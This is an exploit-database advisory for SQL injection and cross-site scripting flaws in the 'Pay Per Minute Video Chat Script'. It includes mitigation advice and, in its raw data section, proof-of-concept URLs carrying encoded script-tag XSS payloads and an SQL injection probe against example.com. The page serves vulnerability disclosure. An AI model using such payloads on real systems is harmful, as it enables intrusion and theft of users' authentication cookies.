header-logo
Suggest Exploit
vendor:
Pay Per Minute Video Chat Script
by:
Unknown
7.5
CVSS
HIGH
SQL Injection, Cross-Site Scripting
89, 79
CWE
Product Name: Pay Per Minute Video Chat Script
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Pay Per Minute Video Chat Script SQL Injection and Cross-Site Scripting Vulnerabilities

The Pay Per Minute Video Chat Script is vulnerable to SQL injection and multiple cross-site scripting (XSS) attacks. The application fails to properly sanitize user-supplied input, allowing an attacker to execute arbitrary SQL queries or inject malicious scripts into web pages.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization techniques. Additionally, web application firewalls can be used to detect and block SQL injection and XSS attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40585/info

Pay Per Minute Video Chat Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Cross-site scripting:

http://www.example.com/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E
 
http://www.example.com/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E


SQL-injection:

http://www.example.com/P47H/index_ie.php?page=-666